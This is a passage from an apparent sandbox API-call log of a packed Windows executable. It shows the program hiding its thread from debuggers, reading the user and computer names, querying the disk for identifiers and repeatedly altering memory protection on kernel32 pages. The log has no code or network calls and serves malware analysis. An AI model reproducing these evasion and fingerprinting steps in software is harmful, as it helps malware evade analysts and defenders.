hInstance=0x13ce000, uID=0xffdf, lpBuffer=0x41edbc, cchBufferMax=1024 | out: lpBuffer="External exception %x") returned 0x15 [0053.127] RtlUnwind (TargetFrame=0x41f794, TargetIp=0x13d1944, ExceptionRecord=0x41f2e0, ReturnValue=0x0) [0053.183] GetModuleFileNameW (in: hModule=0x13c0000, lpFilename=0x6db88c, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WAQro5oWEZAnSlij.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\waqro5owezanslij.exe")) returned 0x3a [0053.207] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WAQro5oWEZAnSlij.exe", nBufferLength=0x104, lpBuffer=0x41f308, lpFilePart=0x41f304 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WAQro5oWEZAnSlij.exe", lpFilePart=0x41f304*="WAQro5oWEZAnSlij.exe") returned 0x3a [0053.207] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WAQro5oWEZAnSlij.exe", lpFindFileData=0x41f560 | out: lpFindFileData=0x41f560*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc81bc80, ftCreationTime.dwHighDateTime=0x1d6a20a, ftLastAccessTime.dwLowDateTime=0xbc81bc80, ftLastAccessTime.dwHighDateTime=0x1d6a20a, ftLastWriteTime.dwLowDateTime=0x39ac3200, ftLastWriteTime.dwHighDateTime=0x1d6a209, nFileSizeHigh=0x0, nFileSizeLow=0x104800, dwReserved0=0x0, dwReserved1=0x0, cFileName="WAQro5oWEZAnSlij.exe", cAlternateFileName="WAQRO5~1.EXE")) returned 0x6e0ab8 [0053.329] FileTimeToLocalFileTime (in: lpFileTime=0x41f574, lpLocalFileTime=0x41f4fc | out: lpLocalFileTime=0x41f4fc) returned 1 [0053.329] FileTimeToDosDateTime (in: lpFileTime=0x41f4fc, lpFatDate=0x41f542, lpFatTime=0x41f540 | out: lpFatDate=0x41f542, lpFatTime=0x41f540) returned 1 [0053.353] SysReAllocStringLen (in: pbstr=0x41f538*=0x0, psz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", len=0x26 | out: pbstr=0x41f538*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned 1 [0053.353] SysReAllocStringLen (in: pbstr=0x41f530*=0x0, psz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WAQro5oWEZAnSlij.exe", len=0x3a | out: pbstr=0x41f530*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WAQro5oWEZAnSlij.exe") returned 1 [0053.401] CharLowerBuffW (in: lpsz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WAQro5oWEZAnSlij.exe", cchLength=0x3a | out: lpsz="c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\waqro5owezanslij.exe") returned 0x3a [0053.402] SysReAllocStringLen (in: pbstr=0x41f81c*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WAQro5oWEZAnSlij.exe", psz="c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\waqro5owezanslij.exe", len=0x3a | out: pbstr=0x41f81c*="c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\waqro5owezanslij.exe") returned 1 [0053.402] SysReAllocStringLen (in: pbstr=0x150a57c*=0x0, psz="c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\waqro5owezanslij.exe", len=0x3a | out: pbstr=0x150a57c*="c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\waqro5owezanslij.exe") returned 1 [0053.474] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77c40000 [0053.475] GetProcAddress (hModule=0x77c40000, lpProcName="NtSetInformationThread") returned 0x77c5f99c [0053.475] GetCurrentThread () returned 0xfffffffe [0053.475] NtSetInformationThread (ThreadHandle=0xfffffffe, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0053.482] VirtualQuery (in: lpAddress=0x13c2000, lpBuffer=0x41f788, dwLength=0x1c | out: lpBuffer=0x41f788*(BaseAddress=0x13c2000, AllocationBase=0x13c0000, AllocationProtect=0x80, RegionSize=0x1000, State=0x1000, Protect=0x80, Type=0x1000000)) returned 0x1c [0053.483] VirtualQuery (in: lpAddress=0x13c8000, lpBuffer=0x41f788, dwLength=0x1c | out: lpBuffer=0x41f788*(BaseAddress=0x13c8000, AllocationBase=0x13c0000, AllocationProtect=0x80, RegionSize=0x6000, State=0x1000, Protect=0x80, Type=0x1000000)) returned 0x1c [0053.483] VirtualQuery (in: lpAddress=0x13ca000, lpBuffer=0x41f788, dwLength=0x1c | out: lpBuffer=0x41f788*(BaseAddress=0x13ca000, AllocationBase=0x13c0000, AllocationProtect=0x80, RegionSize=0x4000, State=0x1000, Protect=0x80, Type=0x1000000)) returned 0x1c [0053.483] VirtualQuery (in: lpAddress=0x13c0000, lpBuffer=0x41f788, dwLength=0x1c | out: lpBuffer=0x41f788*(BaseAddress=0x13c0000, AllocationBase=0x13c0000, AllocationProtect=0x80, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000)) returned 0x1c [0053.483] GetUserNameA (in: lpBuffer=0x150a33c, pcbBuffer=0x150a338 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x150a338) returned 1 [0053.492] GetComputerNameA (in: lpBuffer=0x150a450, nSize=0x150a44c | out: lpBuffer="XDUWTFONO", nSize=0x150a44c) returned 1 [0053.493] MultiByteToWideChar (in: CodePage=0x3, dwFlags=0x0, lpMultiByteStr=0xb200a8, cbMultiByte=43, lpWideCharStr=0x41e7a0, cchWideChar=2047 | out: lpWideCharStr="Software\\Enigma Protector\\%.8x%.8x-%.8x%.8x矉m㮈急⤖ឹ㏐荪琩ꪔЉ") returned 43 [0053.493] SysReAllocStringLen (in: pbstr=0xaf1da0*=0x0, psz="Software\\Enigma Protector\\29AEB4A0365755F6-B862CAE984EA4D0E", len=0x3b | out: pbstr=0xaf1da0*="Software\\Enigma Protector\\29AEB4A0365755F6-B862CAE984EA4D0E") returned 1 [0053.493] VirtualQuery (in: lpAddress=0x13c2000, lpBuffer=0x41f788, dwLength=0x1c | out: lpBuffer=0x41f788*(BaseAddress=0x13c2000, AllocationBase=0x13c0000, AllocationProtect=0x80, RegionSize=0x1000, State=0x1000, Protect=0x80, Type=0x1000000)) returned 0x1c [0053.494] VirtualQuery (in: lpAddress=0x13c8000, lpBuffer=0x41f788, dwLength=0x1c | out: lpBuffer=0x41f788*(BaseAddress=0x13c8000, AllocationBase=0x13c0000, AllocationProtect=0x80, RegionSize=0x6000, State=0x1000, Protect=0x80, Type=0x1000000)) returned 0x1c [0053.494] VirtualQuery (in: lpAddress=0x13ca000, lpBuffer=0x41f788, dwLength=0x1c | out: lpBuffer=0x41f788*(BaseAddress=0x13ca000, AllocationBase=0x13c0000, AllocationProtect=0x80, RegionSize=0x4000, State=0x1000, Protect=0x80, Type=0x1000000)) returned 0x1c [0053.494] VirtualQuery (in: lpAddress=0x13c0000, lpBuffer=0x41f788, dwLength=0x1c | out: lpBuffer=0x41f788*(BaseAddress=0x13c0000, AllocationBase=0x13c0000, AllocationProtect=0x80, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000)) returned 0x1c [0053.494] GetWindowsDirectoryA (in: lpBuffer=0x41f65b, uSize=0x105 | out: lpBuffer="C:\\Windows") returned 0xa [0053.494] CreateFileA (lpFileName="\\\\.\\C:" (normalized: "c:"), dwDesiredAccess=0x0, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x108 [0053.494] DeviceIoControl (in: hDevice=0x108, dwIoControlCode=0x2d1400, lpInBuffer=0x41f760*, nInBufferSize=0xc, lpOutBuffer=0xb20114, nOutBufferSize=0x2710, lpBytesReturned=0x41f770, lpOverlapped=0x0 | out: lpInBuffer=0x41f760*, lpOutBuffer=0xb20114*, lpBytesReturned=0x41f770*=0xa7, lpOverlapped=0x0) returned 1 [0053.495] CloseHandle (hObject=0x108) returned 1 [0053.496] RtlUnwind (TargetFrame=0x41f794, TargetIp=0x13d1944, ExceptionRecord=0x41f2e0, ReturnValue=0x0) [0053.496] GetCurrentProcessId () returned 0xba0 [0053.496] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76d30000 [0053.496] GetProcAddress (hModule=0x76d30000, lpProcName="CreateToolhelp32Snapshot") returned 0x76d6735f [0053.496] GetProcAddress (hModule=0x76d30000, lpProcName="Heap32ListFirst") returned 0x76dc5621 [0053.496] GetProcAddress (hModule=0x76d30000, lpProcName="Heap32ListNext") returned 0x76dc56cb [0053.497] GetProcAddress (hModule=0x76d30000, lpProcName="Heap32First") returned 0x76dc5763 [0053.497] GetProcAddress (hModule=0x76d30000, lpProcName="Heap32Next") returned 0x76dc594e [0053.497] GetProcAddress (hModule=0x76d30000, lpProcName="Toolhelp32ReadProcessMemory") returned 0x76dc5b53 [0053.497] GetProcAddress (hModule=0x76d30000, lpProcName="Process32First") returned 0x76d68ae7 [0053.497] GetProcAddress (hModule=0x76d30000, lpProcName="Process32Next") returned 0x76d688a4 [0053.497] GetProcAddress (hModule=0x76d30000, lpProcName="Process32FirstW") returned 0x76d68baf [0053.497] GetProcAddress (hModule=0x76d30000, lpProcName="Process32NextW") returned 0x76d6896c [0053.497] GetProcAddress (hModule=0x76d30000, lpProcName="Thread32First") returned 0x76dc5b93 [0053.497] GetProcAddress (hModule=0x76d30000, lpProcName="Thread32Next") returned 0x76dc5c3f [0053.497] GetProcAddress (hModule=0x76d30000, lpProcName="Module32First") returned 0x76dc5cd9 [0053.497] GetProcAddress (hModule=0x76d30000, lpProcName="Module32Next") returned 0x76dc5dc2 [0053.498] GetProcAddress (hModule=0x76d30000, lpProcName="Module32FirstW") returned 0x76d679f9 [0053.498] GetProcAddress (hModule=0x76d30000, lpProcName="Module32NextW") returned 0x76d67d96 [0053.498] CreateToolhelp32Snapshot (dwFlags=0x8, th32ProcessID=0xba0) returned 0x10c [0053.501] Module32First (hSnapshot=0x10c, lpme=0x41f580) returned 1 [0053.501] Module32Next (hSnapshot=0x10c, lpme=0x41f580) returned 1 [0053.502] Module32Next (hSnapshot=0x10c, lpme=0x41f580) returned 1 [0053.503] Module32Next (hSnapshot=0x10c, lpme=0x41f580) returned 1 [0053.503] Module32Next (hSnapshot=0x10c, lpme=0x41f580) returned 1 [0053.504] Module32Next (hSnapshot=0x10c, lpme=0x41f580) returned 1 [0053.506] Module32Next (hSnapshot=0x10c, lpme=0x41f580) returned 1 [0053.506] Module32Next (hSnapshot=0x10c, lpme=0x41f580) returned 1 [0053.507] Module32Next (hSnapshot=0x10c, lpme=0x41f580) returned 1 [0053.507] Module32Next (hSnapshot=0x10c, lpme=0x41f580) returned 1 [0053.508] Module32Next (hSnapshot=0x10c, lpme=0x41f580) returned 1 [0053.509] Module32Next (hSnapshot=0x10c, lpme=0x41f580) returned 1 [0053.509] Module32Next (hSnapshot=0x10c, lpme=0x41f580) returned 1 [0053.510] Module32Next (hSnapshot=0x10c, lpme=0x41f580) returned 1 [0053.511] Module32Next (hSnapshot=0x10c, lpme=0x41f580) returned 1 [0053.511] Module32Next (hSnapshot=0x10c, lpme=0x41f580) returned 1 [0053.512] Module32Next (hSnapshot=0x10c, lpme=0x41f580) returned 1 [0053.513] Module32Next (hSnapshot=0x10c, lpme=0x41f580) returned 1 [0053.513] Module32Next (hSnapshot=0x10c, lpme=0x41f580) returned 1 [0053.514] Module32Next (hSnapshot=0x10c, lpme=0x41f580) returned 1 [0053.515] Module32Next (hSnapshot=0x10c, lpme=0x41f580) returned 1 [0053.515] Module32Next (hSnapshot=0x10c, lpme=0x41f580) returned 1 [0053.516] Module32Next (hSnapshot=0x10c, lpme=0x41f580) returned 1 [0053.517] Module32Next (hSnapshot=0x10c, lpme=0x41f580) returned 1 [0053.517] Module32Next (hSnapshot=0x10c, lpme=0x41f580) returned 1 [0053.518] Module32Next (hSnapshot=0x10c, lpme=0x41f580) returned 1 [0053.518] Module32Next (hSnapshot=0x10c, lpme=0x41f580) returned 0 [0053.519] CloseHandle (hObject=0x10c) returned 1 [0053.519] LoadStringA (in: hInstance=0x13ce000, uID=0xffdf, lpBuffer=0x41edbc, cchBufferMax=1024 | out: lpBuffer="External exception %x") returned 0x15 [0053.520] RtlUnwind (TargetFrame=0x41f794, TargetIp=0x13d1944, ExceptionRecord=0x41f2e0, ReturnValue=0x0) [0053.542] RtlUnwind (TargetFrame=0x41f794, TargetIp=0x13d1944, ExceptionRecord=0x41f2e0, ReturnValue=0x0) [0053.543] RtlUnwind (TargetFrame=0x41f794, TargetIp=0x13d1944, ExceptionRecord=0x41f2e0, ReturnValue=0x0) [0053.543] RtlUnwind (TargetFrame=0x41f794, TargetIp=0x13d1944, ExceptionRecord=0x41f2e0, ReturnValue=0x0) [0053.543] RtlUnwind (TargetFrame=0x41f794, TargetIp=0x13d1944, ExceptionRecord=0x41f2e0, ReturnValue=0x0) [0053.543] VirtualQuery (in: lpAddress=0x13c2000, lpBuffer=0x41f788, dwLength=0x1c | out: lpBuffer=0x41f788*(BaseAddress=0x13c2000, AllocationBase=0x13c0000, AllocationProtect=0x80, RegionSize=0x3000, State=0x1000, Protect=0x40, Type=0x1000000)) returned 0x1c [0053.543] VirtualQuery (in: lpAddress=0x13c8000, lpBuffer=0x41f788, dwLength=0x1c | out: lpBuffer=0x41f788*(BaseAddress=0x13c8000, AllocationBase=0x13c0000, AllocationProtect=0x80, RegionSize=0x6000, State=0x1000, Protect=0x80, Type=0x1000000)) returned 0x1c [0053.543] VirtualQuery (in: lpAddress=0x13ca000, lpBuffer=0x41f788, dwLength=0x1c | out: lpBuffer=0x41f788*(BaseAddress=0x13ca000, AllocationBase=0x13c0000, AllocationProtect=0x80, RegionSize=0x4000, State=0x1000, Protect=0x80, Type=0x1000000)) returned 0x1c [0053.543] VirtualQuery (in: lpAddress=0x13c0000, lpBuffer=0x41f788, dwLength=0x1c | out: lpBuffer=0x41f788*(BaseAddress=0x13c0000, AllocationBase=0x13c0000, AllocationProtect=0x80, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000)) returned 0x1c [0053.544] VirtualQuery (in: lpAddress=0x13c2000, lpBuffer=0x41f788, dwLength=0x1c | out: lpBuffer=0x41f788*(BaseAddress=0x13c2000, AllocationBase=0x13c0000, AllocationProtect=0x80, RegionSize=0x3000, State=0x1000, Protect=0x40, Type=0x1000000)) returned 0x1c [0053.544] VirtualQuery (in: lpAddress=0x13c8000, lpBuffer=0x41f788, dwLength=0x1c | out: lpBuffer=0x41f788*(BaseAddress=0x13c8000, AllocationBase=0x13c0000, AllocationProtect=0x80, RegionSize=0x6000, State=0x1000, Protect=0x80, Type=0x1000000)) returned 0x1c [0053.544] VirtualQuery (in: lpAddress=0x13ca000, lpBuffer=0x41f788, dwLength=0x1c | out: lpBuffer=0x41f788*(BaseAddress=0x13ca000, AllocationBase=0x13c0000, AllocationProtect=0x80, RegionSize=0x4000, State=0x1000, Protect=0x80, Type=0x1000000)) returned 0x1c [0053.544] VirtualQuery (in: lpAddress=0x13c0000, lpBuffer=0x41f788, dwLength=0x1c | out: lpBuffer=0x41f788*(BaseAddress=0x13c0000, AllocationBase=0x13c0000, AllocationProtect=0x80, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000)) returned 0x1c [0053.544] WideCharToMultiByte (in: CodePage=0x3, dwFlags=0x0, lpWideCharStr="SOFTWARE\\EnigmaDevelopers", cchWideChar=25, lpMultiByteStr=0x41e6e0, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SOFTWARE\\EnigmaDevelopersçA", lpUsedDefaultChar=0x0) returned 25 [0053.544] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="SOFTWARE\\EnigmaDevelopers", ulOptions=0x0, samDesired=0x20019, phkResult=0x41f6e4 | out: phkResult=0x41f6e4*=0x0) returned 0x2 [0053.545] GetLocalTime (in: lpSystemTime=0x41f704 | out: lpSystemTime=0x41f704*(wYear=0x7e4, wMonth=0xa, wDayOfWeek=0x3, wDay=0xe, wHour=0x14, wMinute=0x11, wSecond=0x1f, wMilliseconds=0x338)) [0053.545] GetLocalTime (in: lpSystemTime=0x41f704 | out: lpSystemTime=0x41f704*(wYear=0x7e4, wMonth=0xa, wDayOfWeek=0x3, wDay=0xe, wHour=0x14, wMinute=0x11, wSecond=0x1f, wMilliseconds=0x338)) [0053.545] MultiByteToWideChar (in: CodePage=0x3, dwFlags=0x0, lpMultiByteStr=0xb21bc8, cbMultiByte=8, lpWideCharStr=0x41e710, cchWideChar=2047 | out: lpWideCharStr="80EB2F5C䕁㑂ぁ㘳㜵㔵㙆䈭㘸䌲䕁㠹䔴㑁い居㈰う䘱㔵䄳ㄱ䐲䕃〭䌰䐹㍂䌸㠱㕄䑆ﴱmA䘨盤ﶌmAV") returned 8 [0053.546] GetLocalTime (in: lpSystemTime=0x41f660 | out: lpSystemTime=0x41f660*(wYear=0x7e4, wMonth=0xa, wDayOfWeek=0x3, wDay=0xe, wHour=0x14, wMinute=0x11, wSecond=0x1f, wMilliseconds=0x338)) [0053.546] GetLocalTime (in: lpSystemTime=0x41f660 | out: lpSystemTime=0x41f660*(wYear=0x7e4, wMonth=0xa, wDayOfWeek=0x3, wDay=0xe, wHour=0x14, wMinute=0x11, wSecond=0x1f, wMilliseconds=0x338)) [0053.546] GetLocalTime (in: lpSystemTime=0x41f660 | out: lpSystemTime=0x41f660*(wYear=0x7e4, wMonth=0xa, wDayOfWeek=0x3, wDay=0xe, wHour=0x14, wMinute=0x11, wSecond=0x1f, wMilliseconds=0x338)) [0053.546] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Enigma Protector\\29AEB4A0365755F6-B862CAE984EA4D0E\\02F01F553A112DCE-00C9DB38C18D5FD1", ulOptions=0x0, samDesired=0x20019, phkResult=0x41f61c | out: phkResult=0x41f61c*=0x0) returned 0x2 [0053.546] CreateFileW (lpFileName="c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\80EB2F5C" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\80eb2f5c"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0053.547] GetLocalTime (in: lpSystemTime=0x41f65c | out: lpSystemTime=0x41f65c*(wYear=0x7e4, wMonth=0xa, wDayOfWeek=0x3, wDay=0xe, wHour=0x14, wMinute=0x11, wSecond=0x1f, wMilliseconds=0x338)) [0053.547] GetLocalTime (in: lpSystemTime=0x41f78c | out: lpSystemTime=0x41f78c*(wYear=0x7e4, wMonth=0xa, wDayOfWeek=0x3, wDay=0xe, wHour=0x14, wMinute=0x11, wSecond=0x1f, wMilliseconds=0x338)) [0053.547] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x14939a0, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x41f7b0 | out: lpThreadId=0x41f7b0*=0xa9c) returned 0x10c [0053.549] LoadStringA (in: hInstance=0x13ce000, uID=0xffdf, lpBuffer=0x41edbc, cchBufferMax=1024 | out: lpBuffer="External exception %x") returned 0x15 [0053.549] RtlUnwind (TargetFrame=0x41f794, TargetIp=0x13d1944, ExceptionRecord=0x41f2e0, ReturnValue=0x0) [0053.550] LoadStringA (in: hInstance=0x13ce000, uID=0xffdf, lpBuffer=0x41edbc, cchBufferMax=1024 | out: lpBuffer="External exception %x") returned 0x15 [0053.550] RtlUnwind (TargetFrame=0x41f794, TargetIp=0x13d1944, ExceptionRecord=0x41f2e0, ReturnValue=0x0) [0053.550] RtlUnwind (TargetFrame=0x41f794, TargetIp=0x13d1944, ExceptionRecord=0x41f2e0, ReturnValue=0x0) [0053.550] RtlUnwind (TargetFrame=0x41f794, TargetIp=0x13d1944, ExceptionRecord=0x41f2e0, ReturnValue=0x0) [0053.551] LoadStringA (in: hInstance=0x13ce000, uID=0xffdf, lpBuffer=0x41edbc, cchBufferMax=1024 | out: lpBuffer="External exception %x") returned 0x15 [0053.551] RtlUnwind (TargetFrame=0x41f794, TargetIp=0x13d1944, ExceptionRecord=0x41f2e0, ReturnValue=0x0) [0053.551] LoadStringA (in: hInstance=0x13ce000, uID=0xffdf, lpBuffer=0x41edbc, cchBufferMax=1024 | out: lpBuffer="External exception %x") returned 0x15 [0053.552] RtlUnwind (TargetFrame=0x41f794, TargetIp=0x13d1944, ExceptionRecord=0x41f2e0, ReturnValue=0x0) [0053.552] RtlUnwind (TargetFrame=0x41f794, TargetIp=0x13d1944, ExceptionRecord=0x41f2e0, ReturnValue=0x0) [0053.552] LoadStringA (in: hInstance=0x13ce000, uID=0xffdf, lpBuffer=0x41edbc, cchBufferMax=1024 | out: lpBuffer="External exception %x") returned 0x15 [0053.553] RtlUnwind (TargetFrame=0x41f794, TargetIp=0x13d1944, ExceptionRecord=0x41f2e0, ReturnValue=0x0) [0053.553] GetCurrentProcessId () returned 0xba0 [0053.553] CreateToolhelp32Snapshot (dwFlags=0x8, th32ProcessID=0xba0) returned 0x110 [0053.557] Module32First (hSnapshot=0x110, lpme=0x41f58c) returned 1 [0053.557] Module32Next (hSnapshot=0x110, lpme=0x41f58c) returned 1 [0053.558] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76d30000 [0053.558] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77c40000 [0053.558] Module32Next (hSnapshot=0x110, lpme=0x41f58c) returned 1 [0053.559] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76d30000 [0053.559] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77c40000 [0053.559] GetModuleFileNameA (in: hModule=0x76d30000, lpFilename=0x41f434, nSize=0x105 | out: lpFilename="C:\\Windows\\syswow64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll")) returned 0x20 [0053.560] GetCurrentProcess () returned 0xffffffff [0053.560] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x76defb74, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x76def000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.561] GetCurrentProcess () returned 0xffffffff [0053.561] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x76defb74, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x76def000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.561] GetCurrentProcess () returned 0xffffffff [0053.561] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x76defc4c, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x76def000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.561] GetCurrentProcess () returned 0xffffffff [0053.561] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x76defc4c, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x76def000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.561] GetCurrentProcess () returned 0xffffffff [0053.561] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x76defc50, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x76def000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.562] GetCurrentProcess () returned 0xffffffff [0053.562] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x76defc50, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x76def000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.562] GetCurrentProcess () returned 0xffffffff [0053.562] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x76defc5c, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x76def000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.562] GetCurrentProcess () returned 0xffffffff [0053.562] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x76defc5c, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x76def000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.562] GetCurrentProcess () returned 0xffffffff [0053.562] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x76defc68, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x76def000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.563] GetCurrentProcess () returned 0xffffffff [0053.563] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x76defc68, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x76def000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.563] GetCurrentProcess () returned 0xffffffff [0053.563] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x76deffb4, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x76def000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.563] GetCurrentProcess () returned 0xffffffff [0053.563] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x76deffb4, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x76def000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.563] GetCurrentProcess () returned 0xffffffff [0053.563] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x76deffc0, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x76def000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.564] GetCurrentProcess () returned 0xffffffff [0053.564] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x76deffc0, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x76def000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.564] GetCurrentProcess () returned 0xffffffff [0053.564] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x76df0044, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x76df0000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.564] GetCurrentProcess () returned 0xffffffff [0053.564] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x76df0044, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x76df0000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.565] GetCurrentProcess () returned 0xffffffff [0053.565] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x76df0048, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x76df0000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.565] GetCurrentProcess () returned 0xffffffff [0053.565] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x76df0048, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x76df0000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.565] GetCurrentProcess () returned 0xffffffff [0053.565] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x76df012c, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: 